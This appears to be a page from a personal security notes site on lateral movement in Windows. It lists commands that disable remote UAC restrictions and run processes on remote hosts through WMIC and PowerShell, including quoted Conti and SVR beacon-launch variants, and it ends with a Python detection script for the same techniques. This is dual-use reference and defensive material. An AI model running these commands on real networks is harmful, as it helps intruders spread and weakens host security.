burmat / nathan burchfield

Lateral Movement

The adversary is trying to move through your environment. https://attack.mitre.org/tactics/TA0008/


Last updated 7 months ago

Disable Remote UAC Restrictions

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIC

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

WMI allows users with the required privileges to execute commands on remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries have used the following commands to execute commands on a remote host.

wmic /node:<remote_ip> /user:<username> /password:<password> process call create cmd.exe /c "<command>"

Or, with PowerShell:

Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>

Conti TTP

wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"

Russian Foreign Intelligence Service (SVR) TTP

wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
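Detection logic for the two techniques on this page (the LocalAccountTokenFilterPolicy change and WMIC remote process creation), as an added example that is not from this site or the cited Picus post. It runs over constructed, Sysmon-shaped events; the host names, IP and field subset are assumptions, and the WmiPrvSE.exe parent relationship is what Win32_Process.Create leaves on the target.

```python
import re

# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1
# (ProcessCreate) and Event ID 13 (RegistryEvent, value set). Hosts are assumed.
SAMPLE_EVENTS = [
    # Target side: WmiPrvSE.exe hosts the Win32_Process.Create call
    {"EventID": 1, "Host": "FS01", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": 'cmd.exe /c "whoami"'},
    {"EventID": 1, "Host": "FS01", "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"},
    # Source side: wmic.exe pointed at another host with /node:
    {"EventID": 1, "Host": "WS07", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic /node:10.0.0.5 process call create cmd.exe"},
    # Benign: interactive process under explorer.exe
    {"EventID": 1, "Host": "WS07", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    # The registry change from the first section of this page
    {"EventID": 13, "Host": "FS01", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies"
                     r"\System\LocalAccountTokenFilterPolicy",
     "Details": "DWORD (0x00000001)"},
]

def detect(event):
    """Return an alert string for one event, or None if nothing matched."""
    if event.get("EventID") == 1:
        parent = str(event.get("ParentImage", "")).lower()
        image = str(event.get("Image", "")).lower()
        cmdline = str(event.get("CommandLine", ""))
        if parent.endswith(r"\wbem\wmiprvse.exe"):
            return "T1047 target: process spawned by WmiPrvSE.exe"
        if image.endswith(r"\wmic.exe") and re.search(r"/node:", cmdline, re.I):
            return "T1047 source: wmic.exe run with /node: (remote execution)"
    elif event.get("EventID") == 13:
        target = str(event.get("TargetObject", "")).lower()
        details = str(event.get("Details", ""))
        if target.endswith(r"\localaccounttokenfilterpolicy") and "0x00000001" in details:
            return "Remote UAC restrictions disabled (LocalAccountTokenFilterPolicy=1)"
    return None

def scan(events):
    """Run detect() over every event and collect (host, alert) pairs."""
    alerts = []
    for event in events:
        verdict = detect(event)
        if verdict:
            alerts.append((event["Host"], verdict))
    return alerts
```

Tune the WmiPrvSE.exe rule to your environment: management agents also spawn children under it, so baseline the child images before alerting on every one.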